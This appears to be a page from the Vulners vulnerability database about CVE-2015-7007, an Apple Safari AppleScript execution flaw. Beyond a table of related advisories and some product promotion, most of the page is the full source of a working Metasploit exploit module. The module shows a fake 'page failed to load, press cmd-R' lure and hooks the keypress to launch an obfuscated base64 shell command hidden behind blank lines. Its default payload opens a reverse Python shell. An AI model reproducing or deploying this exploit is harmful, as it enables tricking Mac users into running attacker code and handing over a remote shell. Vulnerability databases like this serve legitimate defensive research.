Vulners
Lucene search
Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Safari User-Assisted Applescript Exec Attack Exploit | 26 Oct 201500:00 | – | zdt |
 | Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities | 27 May 201600:00 | – | nessus |
| Mac OS X < 10.11.1 Multiple Vulnerabilities | 29 Oct 201500:00 | – | nessus |
 | CVE-2015-7007 | 26 Oct 201500:00 | – | circl |
 | Apple OS X Script Editor Restriction Bypass Vulnerability | 30 Oct 201500:00 | – | cnvd |
 | CVE-2015-7007 | 23 Oct 201521:00 | – | cve |
 | CVE-2015-7007 | 23 Oct 201521:00 | – | cvelist |
 | Safari User-Assisted Applescript Exec Attack | 22 Oct 201514:46 | – | metasploit |
 | CVE-2015-7007 | 23 Oct 201521:59 | – | nvd |
 | Apple Mac OS X Multiple Vulnerabilities-01 (Oct 2015) | 29 Oct 201500:00 | – | openvas |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Safari User-Assisted Applescript Exec Attack',
'Description' => %q{
In versions of Mac OS X before 10.11.1, the applescript:// URL
scheme is provided, which opens the provided script in the Applescript
Editor. Pressing cmd-R in the Editor executes the code without any
additional confirmation from the user. By getting the user to press
cmd-R in Safari, and by hooking the cmd-key keypress event, a user
can be tricked into running arbitrary Applescript code.
Gatekeeper should be disabled from Security & Privacy in order to
avoid the unidentified Developer prompt.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_CMD,
'Platform' => ['unix', 'osx'],
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Targets' =>
[
[ 'Mac OS X', {} ]
],
'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2015',
'Author' => [ 'joev' ],
'References' =>
[
[ 'CVE', '2015-7007' ],
[ 'URL', 'https://support.apple.com/en-us/HT205375' ]
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::SAFARI,
:os_name => OperatingSystems::Match::MAC_OSX
}
))
register_options([
OptString.new('CONTENT', [false, "Content to display in browser",
"This page has failed to load. Press cmd-R to refresh."]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
], self.class)
end
def on_request_exploit(cli, request, profile)
print_status("Sending #{self.name}")
send_response_html(cli, exploit_html)
end
def exploit_html
"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
end
def exploit_js
js_obfuscate %Q|
var as = Array(150).join("\\n") +
'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
window.onkeydown = function(e) {
if (e.keyCode == 91) {
window.location = url;
}
};
|
end
def sh
'killall "Script Editor"; nohup ' + payload.encoded
end
def content
datastore['CONTENT']
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Oct 2015 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.78161